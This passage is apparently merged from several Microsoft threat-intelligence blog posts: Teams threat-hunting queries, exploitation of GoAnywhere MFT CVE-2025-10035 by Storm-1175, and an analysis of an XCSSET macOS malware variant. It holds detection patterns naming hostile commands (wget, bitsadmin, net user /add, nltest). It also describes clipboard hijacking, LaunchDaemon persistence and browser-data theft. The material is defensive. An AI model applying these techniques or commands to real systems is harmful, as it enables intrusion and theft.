To hunt for Teams messages without URLs, use the CloudAppEvents table, populated by Defender for Cloud Apps. This table also includes chat monitoring events, meeting and Teams call tracking, and behavioral analytics. To make sure advanced hunting tables are populated by Defender for Cloud Apps data, go to the Defender portal and select Settings > Cloud apps > App connectors. Then, in the Select Microsoft 365 components page, select the Microsoft 365 activities checkbox. Control Microsoft 365 with built-in policies and policy templates to detect and notify you about potential threats.
Many of the detection types enabled by default apply to Teams and do not require custom policy creation, including sign-ins from geographically distant locations in a short time, access from a country not previously associated with a user, unexpected admin actions, mass downloads, activity from anonymous IP addresses, or from a device flagged as malware-infected by Defender for Endpoint, as well as Oauth app abuse (when app governance is turned on).
Defender for Cloud Apps enables you to identify high-risk use and cloud security issues, detect abnormal user behavior, and prevent threats in your sanctioned cloud apps. You can integrate Defender for Cloud Apps with Microsoft Sentinel (preview) or use the supported APIs.
Refer to the compromised and malicious applications incident response playbook. This playbook includes relevant guidance for identifying and investigating malicious activity on third-party apps installed in Teams, custom apps using the Graph API for Teams, or OAuth abuse involving Teams permissions.
Discover and enable the Microsoft Sentinel data lake in Defender XDR. Sentinel data lake brings together security logs from data sources like Microsoft Defender and Microsoft Sentinel, Microsoft 365, Microsoft Entra ID, Purview, Intune, Microsoft Resource Graph, firewall and network logs, identity and access logs, DNS, plus sources from hundreds of connectors and solutions, including Microsoft Defender Threat Intelligence. Advanced hunting KQL queries can be run directly on the data lake. You can analyze the data using Jupyter notebooks.
Microsoft Defender detections
Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, apps to provide integrated protection against attacks like the threat discussed in this blog.
Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.
Microsoft Defender XDR
The following alerts might indicate threat activity associated with this threat.
Malicious sign in from a risky IP address
Malicious sign in from an unusual user agent
Account compromised following a password-spray attack
Compromised user account identified in Password Spray activity
Successful authentication after password spray attack
Password Spray detected via suspicious Teams client (TeamFiltration)
Microsoft Entra ID Protection
Any type of sign-in and user risk detection might also indicate threat activity associated with this threat. An example is listed below. These alerts, however, can be triggered by unrelated threat activity.
Impossible travel
Anomalous Microsoft Teams login from web client
Microsoft Defender for Endpoint
The following alerts might indicate threat activity associated with this threat.
Suspicious module loaded using Microsoft Teams
The following alerts might also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.
Suspicious usage of remote management software
Microsoft Defender for Office 365
The following alerts might indicate threat activity associated with this threat.
Malicious link shared in Teams chat
User clicked a malicious link in Teams chat
When Microsoft Defender for Cloud Apps is enabled, the following alert might indicate threat activity associated with this threat.
Potentially Malicious IT Support Teams impersonation post mail bombing
The following alerts might also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.
A potentially malicious URL click was detected
Possible AiTM phishing attempt
Microsoft Defender for Identity
The following Microsoft Defender for Identity alerts can indicate associated threat activity:
Account enumeration reconnaissance
Suspicious additions to sensitive groups
Account Enumeration reconnaissance (LDAP)
Microsoft Defender for Cloud Apps
The following alerts might indicate threat activity associated with this threat.
Consent granted to application with Microsoft Teams permissions
Risky user installed a suspicious application in Microsoft Teams
Compromised account signed in to Microsoft Teams
Microsoft Teams chat initiated by a suspicious external user
Suspicious Teams access via Graph API
The following alerts might also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.
Possible mail exfiltration by app
Microsoft Security Copilot
Microsoft Security Copilot customers can use the Copilot in Defender embedded experience to check the impact of this report and get insights based on their environment’s highest exposure level in Threat analytics, Intel profiles, Intel Explorer and Intel projects pages of the Defender portal.
You can also use Copilot in Defender to speed up analysis of suspicious scripts and command lines by inspecting them below the incident graph on an incident page and in the timeline on the Device entity page without using external tools.
Threat intelligence reports
Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.
Microsoft Security Copilot customers can also use the Microsoft Security Copilot integration in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the embedded experience in the Microsoft Defender portal to get more information about this threat actor.
Hunting queries
Microsoft Defender XDR
Advanced hunting allows you to view and query all the data sources available within the unified Microsoft Defender portal, which include Microsoft Defender XDR and various Microsoft security services.
After onboarding to the Microsoft Sentinel data lake, auxiliary log tables are no longer available in Microsoft Defender advanced hunting. Instead, you can access them through data lake exploration Kusto Query Language (KQL) queries in the Defender portal. For more information, see KQL queries in the Microsoft Sentinel data lake.
You can design and tweak custom detection rules using the advanced hunting queries and set them to run at regular intervals, generating alerts and taking response actions whenever there are matches. You can also link the generated alert to this report so that it appears in the Related incidents tab in threat analytics. Custom detection rule can automatically take actions on devices, files, users, or emails that are returned by the query. To make sure you’re creating detections that trigger true alerts, take time to review your existing custom detections by following the steps in Manage existing custom detection rules.
Detect potential data exfiltration from Teams
let timeWindow = 1h;
let messageThreshold = 20;
let trustedDomains = dynamic(["trustedpartner.com", "anothertrusted.com"]);
CloudAppEvents
| where Timestamp > ago(1d)
| where ActionType == "MessageSent"
| where Application == "Microsoft Teams"
| where isnotempty(AccountObjectId)
| where tostring(parse_json(RawEventData).ParticipantInfo.HasForeignTenantUsers) == "true"
| where tostring(parse_json(RawEventData).CommunicationType) in ("OneOnOne", "GroupChat")
| extend RecipientDomain = tostring(parse_json(RawEventData).ParticipantInfo.ParticipatingDomains[1])
| where RecipientDomain !in (trustedDomains)
| extend SenderUPN = tostring(parse_json(RawEventData).UserId)
| summarize MessageCount = count() by bin(Timestamp, timeWindow), SenderUPN, RecipientDomain
| where MessageCount > messageThreshold
| project Timestamp, MessageCount, SenderUPN, RecipientDomain
| sort by MessageCount desc
Detect mail bombing that sometimes precedes technical support scams on Microsoft Teams
EmailEvents
| where Timestamp > ago(1d)
| where DetectionMethods contains "Mail bombing"
| project Timestamp, NetworkMessageId, SenderFromAddress, Subject, ReportId
Detect malicious Teams content from MessageEvents
MessageEvents
| where Timestamp > ago(1d)
| where ThreatTypes has "Phish"
or ThreatTypes has "Malware"
or ThreatTypes has "Spam"
| project Timestamp, SenderDisplayName, SenderEmailAddress, RecipientDetails, IsOwnedThread, ThreadType, IsExternalThread, ReportId
Detect communication with external help desk/support representatives
MessageEvents
| where Timestamp > ago(5d)
| where IsExternalThread == true
| where (RecipientDetails contains "help" and RecipientDetails contains "desk")
or (RecipientDetails contains "it" and RecipientDetails contains "support")
or (RecipientDetails contains "working" and RecipientDetails contains "home")
or (SenderDisplayName contains "help" and SenderDisplayName contains "desk")
or (SenderDisplayName contains "it" and SenderDisplayName contains "support")
or (SenderDisplayName contains "working" and SenderDisplayName contains "home")
| project Timestamp, SenderDisplayName, SenderEmailAddress, RecipientDetails, IsOwnedThread, ThreadType
Expand detection of communication with external help desk/support representatives by searching for linked process executions
let portableExecutable = pack_array("binary.exe", "portable.exe");
let timeAgo = ago(30d);
MessageEvents
| where Timestamp > timeAgo
| where IsExternalThread == true
| where (RecipientDetails contains "help" and RecipientDetails contains "desk")
or (RecipientDetails contains "it" and RecipientDetails contains "support")
or (RecipientDetails contains "working" and RecipientDetails contains "home")
| summarize spamEvent = min(Timestamp) by SenderEmailAddress
| join kind=inner (
DeviceProcessEvents
| where Timestamp > timeAgo
| where FileName in (portableExecutable)
) on $left.SenderEmailAddress == $right.InitiatingProcessAccountUpn
| where spamEvent
Surface Teams threat activity using Microsoft Security Copilot
Microsoft Security Copilot in Microsoft Defender comes with a query assistant capability in advanced hunting. You can also run the following prompt in Microsoft Security Copilot pane in the Advanced hunting page or by reopening Copilot from the top of the query editor:
Show me recent activity in the last 7 days that matches attack techniques described in the Microsoft Teams technique profile. Include relevant alerts, affected users and devices, and generate advanced hunting queries to investigate further.
Microsoft Sentinel
Possible Teams phishing activity
This query specifically monitors Microsoft Teams for one-on-one chats involving impersonated users (e.g., 'Help Desk', 'Microsoft Security').
let suspiciousUpns = DeviceProcessEvents
| where DeviceId == "alertedMachine"
| where isnotempty(InitiatingProcessAccountUpn)
| project InitiatingProcessAccountUpn;
CloudAppEvents
| where Application == "Microsoft Teams"
| where ActionType == "ChatCreated"
| where isempty(AccountObjectId)
| where RawEventData.ParticipantInfo.HasForeignTenantUsers == true
| where RawEventData.CommunicationType == "OneonOne"
| where RawEventData.ParticipantInfo.HasGuestUsers == false
| where RawEventData.ParticipantInfo.HasOtherGuestUsers == false
| where RawEventData.Members[0].DisplayName in ("Microsoft Security", "Help Desk", "Help Desk Team", "Help Desk IT", "Microsoft Security", "office")
| where AccountId has "@"
| extend TargetUPN = tolower(tostring(RawEventData.Members[1].UPN))
| where TargetUPN in (suspiciousUpns)
Files uploaded to Teams and access summary
This query identifies files uploaded to Microsoft Teams chat files and their access history, specifically mentioning operations from SharePoint. It allows tracking of potential file collection activity through Teams-related storage.
OfficeActivity
| where RecordType =~ "SharePointFileOperation"
| where Operation =~ "FileUploaded"
| where UserId != "app@sharepoint"
| where SourceRelativeUrl has "Microsoft Teams Chat Files"
| join kind= leftouter (
OfficeActivity
| where RecordType =~ "SharePointFileOperation"
| where Operation =~ "FileDownloaded" or Operation =~ "FileAccessed"
| where UserId != "app@sharepoint"
| where SourceRelativeUrl has "Microsoft Teams Chat Files"
) on OfficeObjectId
| extend userBag = bag_pack(UserId1, ClientIP1)
| summarize make_set(UserId1, 10000), make_bag(userBag, 10000) by TimeGenerated, UserId, OfficeObjectId, SourceFileName
| extend NumberUsers = array_length(bag_keys(bag_userBag))
| project timestamp=TimeGenerated, UserId, FileLocation=OfficeObjectId, FileName=SourceFileName, AccessedBy=bag_userBag, NumberOfUsersAccessed=NumberUsers
| extend AccountName = tostring(split(UserId, "@")[0]), AccountUPNSuffix = tostring(split(UserId, "@")[1])
| extend Account_0_Name = AccountName
| extend Account_0_UPNSuffix = AccountUPNSuffix
To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.
On September 18, 2025, Fortra published a security advisory regarding a critical deserialization vulnerability in GoAnywhere MFT’s License Servlet, which is tracked as CVE-2025-10035 and has a CVSS score of 10.0. The vulnerability could allow a threat actor with a validly forged license response signature to deserialize an arbitrary actor-controlled object, possibly leading to command injection and potential remote code execution (RCE). A cybercriminal group tracked by Microsoft Threat Intelligence as Storm-1175, known for deploying Medusa ransomware and exploiting public-facing applications for initial access, was observed exploiting the vulnerability.
Microsoft urges customers to upgrade to the latest version following Fortra’s recommendations. We are publishing this blog post to increase awareness of this threat and to share end-to-end protection coverage details across Microsoft Defender, as well as security posture hardening recommendations for customers.
Vulnerability analysis
The vulnerability, tracked as CVE-2025-10035, is a critical deserialization flaw impacting GoAnywhere MFT’s License Servlet Admin Console versions up to 7.8.3. It enables an attacker to bypass signature verification by crafting a forged license response signature, which then allows the deserialization of arbitrary, attacker-controlled objects.
Successful exploitation could result in command injection and potential RCE on the affected system. Public reports indicate that exploitation does not require authentication if the attacker can craft or intercept valid license responses, making this vulnerability particularly dangerous for internet-exposed instances.
The impact of CVE-2025-10035 is amplified by the fact that, upon successful exploitation, attackers could perform system and user discovery, maintain long-term access, and deploy additional tools for lateral movement and malware. Public advisories recommend immediate patching, reviewing license verification mechanisms, and closely monitoring for suspicious activity in GoAnywhere MFT environments to mitigate risks associated with this vulnerability.
Exploitation activity by Storm-1175
Microsoft Defender researchers identified exploitation activity in multiple organizations aligned to tactics, techniques, and procedures (TTPs) attributed to Storm-1175. Related activity was observed on September 11, 2025.
An analysis of the threat actor’s TTPs reveals a multi-stage attack. For initial access, the threat actor exploited the then-zero-day deserialization vulnerability in GoAnywhere MFT. To maintain persistence, they abused remote monitoring and management (RMM) tools, specifically SimpleHelp and MeshAgent. They dropped the RMM binaries directly under the GoAnywhere MFT process. In addition to these RMM payloads, the creation of .jsp files within the GoAnywhere MFT directories was observed, often at the same time as the dropped RMM tools.
The threat actor then executed user and system discovery commands and deployed tools like netscan for network discovery. Lateral movement was achieved using mstsc.exe, allowing the threat actor to move across systems within the compromised network.
For command and control (C2), the threat actor utilized RMM tools to establish their infrastructure and even set up a Cloudflare tunnel for secure C2 communication. During the exfiltration stage, the deployment and execution of Rclone was observed in at least one victim environment. Ultimately, in one compromised environment, the successful deployment of Medusa ransomware was observed.
Mitigation and protection guidance
Microsoft recommends the following mitigations to reduce the impact of this threat.
Upgrade to the latest version following Fortra’s recommendations. Note that upgrading does not address previous exploitation activity, and review of the impacted system may be required.
Use an enterprise attack surface management product, like Microsoft Defender External Attack Surface Management (Defender EASM), to discover unpatched systems on your perimeter.
Check your perimeter firewall and proxy to ensure servers are restricted from accessing the internet for arbitrary connections, like browsing and downloads. Such restrictions help inhibit malware downloads and command-and-control activity.
Run endpoint detection and response (EDR) in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.
Enable investigation and remediation in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.
Turn on block mode in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants.
Microsoft Defender customers can turn on attack surface reduction rules to prevent common attack techniques used in ransomware attacks. Attack surface reduction rules are sweeping settings that are effective at stopping entire classes of threats:
Following the release of the vulnerability, the Microsoft Defender Research Team ensured that protections are deployed for customers, from ensuring that Microsoft Defender Vulnerability Management correctly identifies and surfaces all vulnerable devices in impacted customer environments, to building Microsoft Defender for Endpoint detections and alerting along the attack chain.
Microsoft Defender Vulnerability Management customers can search for this vulnerability in the Defender Portal or navigate directly to the CVE page to view a detailed list of the exposed devices within their organization.
Customers of Microsoft Defender Experts for XDR that might have been impacted have also been notified of any post-exploitation activity and recommended actions.
Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, apps to provide integrated protection against attacks like the threat discussed in this blog.
Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.
Tactic
Observed activity
Microsoft Defender coverage
Initial access
Exploitation of GoAnywhere MFT via deserialization in Licensing Service
Microsoft Defender for Endpoint detects possible exploitation via the following alert: – Possible exploitation of GoAnywhere MFT vulnerability
Microsoft Defender Experts for XDR can detect possible exploitation via the following alerts: – Possible exploitation of vulnerability in GoAnywhere Tomcat – Possible discovery activity following successful Tomcat vulnerability exploitation
Microsoft Defender Vulnerability Management(MDVM) surfaces devices vulnerable to CVE-2025-10035.
Microsoft Defender External Attack Surface Management Attack Surface Insights with the following title can indicate vulnerable devices on your network but is not necessarily indicative of exploitation: – [Potential] CVE-2025-10035 – GoAnywhere MFT Command Injection via Deserialization in Licensing Service
(Note: An Attack Surface Insight marked as potential indicates a service is running but cannot validate whether that service is running a vulnerable version. Check resources to verify that they are up to date.)
Persistence
Dropping and abuse of remote monitoring and management (RMM) tool and suspected web shell deployment; creation of .jsp files within the GoAnywhere MFT directories
Microsoft Defender for Endpoint detects possible signs of the attacker deploying persistence mechanisms via the following alerts: – Uncommon remote access software – Remote access software – Suspicious file dropped and launched – Suspicious service launched – Suspicious account creation – User account created under suspicious circumstances – New local admin added using Net commands – New group added suspiciously – Suspicious Windows account manipulation – Ransomware-linked threat actor detected
Discovery
User and system discovery commands; deployment of tools such as netscan for network discovery
Microsoft Defender for Endpoint detects malicious exploration activities via the following alerts: – Suspicious sequence of exploration activities – Anomalous account lookups – Suspicious Windows account manipulation
Command and control
Use of RMM tools for establishing C2 infrastructure and setup of Cloudflare tunnel for secure C2 communication
Microsoft Defender for Endpoint detects C2 activities observed in this campaign via the following alerts: – Uncommon remote access software – Remote access software
Exfiltration
Rclone deployment and execution
Microsoft Defender for Endpoint detects exfiltration activities observed in this campaign via the following alert: – Ransomware-linked threat actor detected
Actions on objectives
Deployment of Medusa ransomware
Microsoft Defender Antivirus detects the ransomware payload used in this attack as the following threat: – Ransom:Win32/Medusa
Microsoft Defender for Endpoint detects the ransomware payload via the following alerts: – Ransomware-linked threat actor detected
Microsoft Security Copilot
Security Copilot customers can use the standalone experience to create their own prompts or run the following prebuilt promptbooks to automate incident response or investigation tasks related to this threat:
Incident investigation
Microsoft User analysis
Threat actor profile
Threat Intelligence 360 report based on MDTI article
Vulnerability impact assessment
Note that some promptbooks require access to plugins for Microsoft products such as Microsoft Defender XDR or Microsoft Sentinel.
Threat intelligence reports
Microsoft Defender XDR customers can use the following threat analytics reports in the Defender portal (requires license for at least one Defender XDR product) to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.
Microsoft Security Copilot customers can also use the Microsoft Security Copilot integration in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the embedded experience in the Microsoft Defender portal to get more information about this threat actor.
Hunting queries
Microsoft Defender XDR
Microsoft Defender XDR customers can run the following query to find related activity in their networks:
Vulnerable devices
Find devices affected by the CVE-2025-10035 vulnerability.
DeviceTvmSoftwareVulnerabilities
| where CveId in ("CVE-2025-10035")
| summarize by DeviceName, CveId
Possible GoAnywhere MFT exploitation
Look for suspicious PowerShell commands indicative of GoAnywhere MFT exploitation. These commands are also detected with the Defender for Endpoint alert Possible exploitation of GoAnywhere MFT vulnerability.
Look for suspicious cmd.exe commands launched after possible GoAnywhere MFT exploitation. These commands are also detected with the Defender for Endpoint alert Possible exploitation of GoAnywhere MFT vulnerability.
DeviceProcessEvents
| where InitiatingProcessFolderPath contains @"\GoAnywhere\"
| where InitiatingProcessFileName contains "tomcat"
| where InitiatingProcessCommandLine endswith "//RS//GoAnywhere"
| where ProcessCommandLine !contains @"\GIT\"
| where FileName == "cmd.exe"
| where ProcessCommandLine has_any ("powershell.exe", "powershell ", "rundll32.exe", "rundll32 ", "bitsadmin.exe", "bitsadmin ", "wget http", "quser") or ProcessCommandLine has_all ("nltest", "/dclist") or ProcessCommandLine has_all ("nltest", "/domain_trusts") or ProcessCommandLine has_all ("net", "user ", "/add") or ProcessCommandLine has_all ("net", "user ", " /domain") or ProcessCommandLine has_all ("net", " group", "/domain")
Storm-1175 indicators of compromise
The following query identifies known post-compromise tools leveraged in recent GoAnywhere exploitation activity attributed to Storm-1175. Note that the alert Ransomware-linked threat actor detected will detect these hashes.
let fileHashes = dynamic(["4106c35ff46bb6f2f4a42d63a2b8a619f1e1df72414122ddf6fd1b1a644b3220", "c7e2632702d0e22598b90ea226d3cde4830455d9232bd8b33ebcb13827e99bc3", "cd5aa589873d777c6e919c4438afe8bceccad6bbe57739e2ccb70b39aee1e8b3", "5ba7de7d5115789b952d9b1c6cff440c9128f438de933ff9044a68fff8496d19"]);
union
(
DeviceFileEvents
| where SHA256 in (fileHashes)
| project Timestamp, FileHash = SHA256, SourceTable = "DeviceFileEvents"
),
(
DeviceEvents
| where SHA256 in (fileHashes)
| project Timestamp, FileHash = SHA256, SourceTable = "DeviceEvents"
),
(
DeviceImageLoadEvents
| where SHA256 in (fileHashes)
| project Timestamp, FileHash = SHA256, SourceTable = "DeviceImageLoadEvents"
),
(
DeviceProcessEvents
| where SHA256 in (fileHashes)
| project Timestamp, FileHash = SHA256, SourceTable = "DeviceProcessEvents"
)
| order by Timestamp desc
Indicators of compromise
File IoCs (RMM tools in identified Storm-1175 exploitation activity):
To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.
Microsoft Threat Intelligence has identified yet another XCSSET variant in the wild that introduces further updates and new modules beyond those detailed in our March 2025 blog post. The XCSSET malware is designed to infect Xcode projects, typically used by software developers, and run while an Xcode project is being built. We assess that this mode of infection and propagation banks on project files being shared among developers building Apple or macOS-related applications.
This new variant of XCSSET brings key changes related to browser targeting, clipboard hijacking, and persistence mechanisms. It employs sophisticated encryption and obfuscation techniques, uses run-only compiled AppleScripts for stealthy execution, and expands its data exfiltration capabilities to include Firefox browser data. It also adds another persistence mechanism through LaunchDaemon entries.
This variant features a submodule designed to monitor the clipboard and references a downloaded configuration file containing address regex patterns associated with various digital wallets. If a pattern match is detected, XCSSET is capable of substituting the clipboard content with its own predefined set of wallet addresses.
In this blog, we will discuss the new modules added to the XCSSET’s inventory and key changes to existing ones. While we’re only seeing this new XCSSET variant in limited attacks as of this writing, we’re publishing our comprehensive analysis to increase awareness of this evolving threat. We shared these findings with Apple and collaborated with GitHub to take down repositories affected by XCSSET. This work reflects our broader commitment to disrupting attacks and dismantling attacker operations. Alongside our findings, we are sharing actionable detections, recommendations, and best practices to help organizations defend against this threat with confidence.
Analysis
The latest XCSSET variant follows a four-stage infection chain. The initial three stages are consistent with those observed in previous variants, as described in our previous blog. This analysis begins with the fourth stage, which includes the boot() function and its associated calls to download and run submodules.
boot() function of the fourth-stage script
The new variant introduces modifications to the boot function. These include additional checks for Firefox browser and modified logic for Telegram existence check. This stage also has multiple new modules that it downloads and executes.
Older variant:
Figure 1. boot() function of the earlier variant
New variant:
Figure 2. boot() function of the latest version
In the following sections, we examine changes to existing submodules as well as additional modules in this variant.
vexyeqj [Older variant: seizecj] (Info-stealer)
In comparison to the previous variant, several commands in this script are commented out. Additionally, it downloads a module called bnk, which is executed using osascript, with the domain supplied as a parameter. It then waits for three seconds and deletes the downloaded file.
Figure 3. Main logic of the Info-stealer submodule
The bnk file is a run-only compiled AppleScript. Direct decompilation of run-only compiled AppleScript is generally considered challenging or not feasible; however, the AppleScript disassembler project on Github can be used to disassemble the code for analysis.
The script defines several functions for purposes such as data validation, encryption, decryption, obtaining additional data from command and control (C2), and logging. The script is executed with the domain as its parameter.
Figure 4. Disassembled code of the dec() function
Above is a code snippet of the dec() function, which is used to decrypt the data received from C2 server. Parsing the above leads to the command:
In the referenced code, the encrypted data is stored in the variable in. The first 32 characters of this variable are extracted to serve as the initialization vector (IV). The remaining data is then Base64-decoded and provided to the AES decryption function. In this case, the decryption key is a predefined constant, 27860c1670a8d2f3de7bbc74cd754121, which was established and computed within the main function.
The decoded blob appears to be a configuration file. Presented below is a formatted and redacted sample of the decrypted response obtained from the C2 server:
Figure 5. Configuration data received from the C2 server
The following section examines the core logic of the downloaded bnk payload, explaining how the previous information is interpreted and applied.
Firstly, it calls a defined function to obtain the configuration data from the C2 server; this data is decrypted and stored in a variable. Shell commands are executed to retrieve the SerialNumber and the current user.
The clipboard content is retrieved which was determined by checking the AEVT (Apple Event Code) codes. The process then identifies the frontmost application, which is checked against a blocklist defined by the “bad” property in the response from C2. Processing proceeds only if the current clipboard data differs from both the last clipboard entry and the last replaced clipboard data, the length of the clipboard data exceeds 25 characters, and the oD() function does not return true. The oD() function returns true when the first four characters are digits. After the above checks, it then has multiple gates and conditions. The first condition checks if the clipboard length is between 50 < len(clipboard) < 300. It then checks if the clipboard matches the pattern defined in the s record in the response. If it matches, the clipboard data is formatted in a record type string and is exfiltrated to the C2 server. The transmitted data is also AES-encrypted.
In the second condition, the script verifies whether the clipboard length is between 25 and 65, whether it was executed with a single argument, and whether cD(clipboard_data) function returns a value greater than 1, which refers to the count of digits in the data passed in argument. If these conditions are met, the script iterates through the sub collection in the C2 response, which includes individual entries for various wallets. Each sub collection entry contains:
a: Contains a list of addresses from which one is selected; the corresponding clipboard data is subsequently replaced.
t: Refers to the wallet identifier.
r: Specifies the regex pattern used for matching addresses associated with this wallet.
ir (optional): Represents a negative regex pattern; addresses matching this pattern should be excluded.
p: Appears to function as a counter or record index.
For each record, it matches pattern for r and ir. If the variable r is true and ir is false, then the program checks whether the clipboard content matches any of the attacker’s addresses. If it does not, it selects an address from the list and replaces the clipboard’s content accordingly. The system subsequently sends information—including the original clipboard data, the replaced data, the wallet name, frontmost application, and other relevant details—to the C2 server. Next, it assigns the value of the clipboard data to the xcP variable, which tracks the most recently replaced clipboard entry. Finally, it updates the xP variable to reflect the current clipboard text, waits for two seconds, and repeats the loop.
neq_cdyd_ilvcmwx (File-stealer)
This module retrieves an additional script from the C2 server, which is saved in the /tmp/ directory. The script is subsequently executed with the domain and moduleName provided as parameters. After execution, the downloaded file is deleted. The module operates as a compiled, run-only AppleScript. The script bears similarity to the txzx_vostfdi module, previously identified as a digital wallet data stealer targeting browsers. During analysis, the C2 server did not supply a folder list; however, it is capable of exfiltrating files back to the C2 server.
Figure 6. Additional script being downloaded and executed
xmyyeqjx (LaunchDaemon-based persistence)
This submodule sets up LaunchDaemon persistence for the ~/.root file, which is created in this module. Here’s a summary of the script:
The process begins by creating several paths and a ~/.root file in the user’s HOME directory, which will contain the payload. The payload performs the following actions:
Changes the directory to /Users/Shared
Checks the network connection
Retrieves the local signed-in user
Sleeps for 30 seconds
Executes the ~/.zshrc file in the context of the signed-in user (.zshrc file was appended with malicious payload in previous submodules)
Sleeps for 30 seconds
Modifies two configurations to execute system commands that disable macOS automatic configuration updates and Rapid Security Response mechanisms.
These commands modify macOS Software Update preferences to disable various critical Apple Updates, including Rapid Security Responses (RSR), Security Configuration updates, and others.
It then calls the doMainFunc() function.
Figure 7. Creation of fake application and downloading of additional script from C2 server.
This function first checks the existence of a LaunchDaemon entry with the presence of .root file in its contents. If it’s not found, it downloads another script from the C2 server, which is again a run-only compiled AppleScript. It then creates a fake application named System Settings.app in the /tmp directory, which basically executes this downloaded AppleScript with two parameters. These parameters appear to be the Label/Plist Name and the file to be persisted (~/.root file). After creating the fake app, it calls another function where it waits for the legitimate System Settings application to get started, upon which it executes the fake application. This behavior is done to masquerade itself as legitimate.
The downloaded script first gets the device’s serial number and the current username by executing shell commands. It then forms path to the LaunchDaemon plist file and constructs its content. It uses the echo command to paste this constructed content to the LaunchDaemon file. The file name is the name that was passed in the argument. Below is an example of the created plist file:
Figure 8. Plist content of the created LaunchDaemon entry
It masquerades with prefix com.google. in plist name and executes the ~/.root file using bash. The echo command is run using “do shell script …. with administrator privileges” which can be implied by the badm AEVT code. It then executes chown command to change owner to root:wheel and sets 644 permissions to the plist file. Lastly, it executes the launchctl load -w command with sudo to start the daemon.
jey [Older Variant: jez] (Git-based persistence)
The command in the older variant executes a direct concatenation of encrypted payload along with the repeated decryption command directly through the shell. In the new variant, the decryption logic is encapsulated within a shell function, which is defined inline and then used to decrypt the encrypted string before passing it to the shell for execution. This change primarily enhances the obfuscation method used by malware.
Old logic:
Figure 9. Payload generation logic in older variant
New logic:
Figure 10. Payload generation logic in the latest variant
iewmilh_cdyd (Info-stealer targeting Firefox)
This new variant has added an info-stealer module to exfiltrate data stored by Firefox. The runMe() function is invoked at first to download a Mach-O FAT binary, which is responsible for all info stealing operations, from the C2 server.
Figure 11. Downloading compiled binary of the HackBrowserData project
This downloaded binary appears to be a modified version of a GitHub project HackBrowserData, which is capable of decrypting and exporting browser data stored by browsers. Passwords, history, credit card information, and cookies are some of the key information it can extract from almost all popular browsers.
Upon downloading, the binary is given executable file permissions, is ad-hoc signed on the victim’s machine, and executed with –b firefox -f json –dir ” & resDir & ” –zip as arguments:
-b: Browser name
-f: format of the output data
–dir: Export directory where the output is stored
–zip: This flag stores the output in compressed ZIP
Once all the data is retrieved, it uploads the compressed ZIP and log file to C2 server with its old method of exfiltrating data in chunks.
Mitigation and protection guidance
Defenders can take the following mitigation steps to defend against this threat:
Run the latest version of your operating systems and applications. Deploy the latest security updates as soon as they become available.
Always inspect and verify Xcode projects downloaded or cloned from repositories, as the malware usually spreads through infected projects.
Exercise caution when copying and pasting sensitive data from the clipboard. Always verify that the pasted content matches the intended source to avoid falling victim to clipboard hijacking or data tampering attacks.
Encourage users to use web browsers that support Microsoft Defender SmartScreen like Microsoft Edge—available on macOS and various platforms—which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that contain exploits and host malware.
Microsoft Defender for Endpoint customers can also apply the following mitigations to reduce the environmental attack surface and mitigate the impact of this threat and its payloads:
Turn on cloud-delivered protection and automatic sample submission on Microsoft Defender Antivirus. These capabilities use artificial intelligence and machine learning to quickly identify and stop new and unknown threats.
Enable potentially unwanted application (PUA) protection in block mode to automatically quarantine PUAs like adware. PUA blocking takes effect on endpoint clients after the next signature update or computer restart. PUA blocking takes effect on endpoint clients after the next signature update or computer restart.
Turn on network protection to block connections to malicious domains and IP addresses.
Microsoft Defender XDR detections
Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, apps to provide integrated protection against attacks like the threat discussed in this blog.
Tactic
Observed activity
Microsoft Defender coverage
Initial access
– Malicious Xcode projects
Microsoft Defender Antivirus – Trojan:MacOS/XCSSET.PB
Microsoft Defender for Endpoint – Possible XCSSET activity
Microsoft Defender for Endpoint – Suspicious file dropped and launched – Suspicious script launched – Network connection by osascript – Suspicious process launched from a world-writable directory
Persistence
– Hidden LaunchDaemon persistence
Microsoft Defender Antivirus – Behavior:MacOS/SuspHiddenPersistence.A1
Microsoft Defender for Endpoint – Suspicious Plist modifications – Suspicious launchctl tool activity
Defense evasion
– Suspicious obfuscated command
Microsoft Defender for Endpoint – Suspicious file or information obfuscation detected
Credential access
– Use of modified HackBrowserData project
Microsoft Defender Antivirus – Trojan:MacOS/HackBrowserData.A
Impact
– Xcode project infection
Microsoft Defender Antivirus – Behavior:MacOS/XCSSET.A
Note: For detections associated with older variants of XCSSET, refer to our March 2025 blog post.
Threat intelligence reports
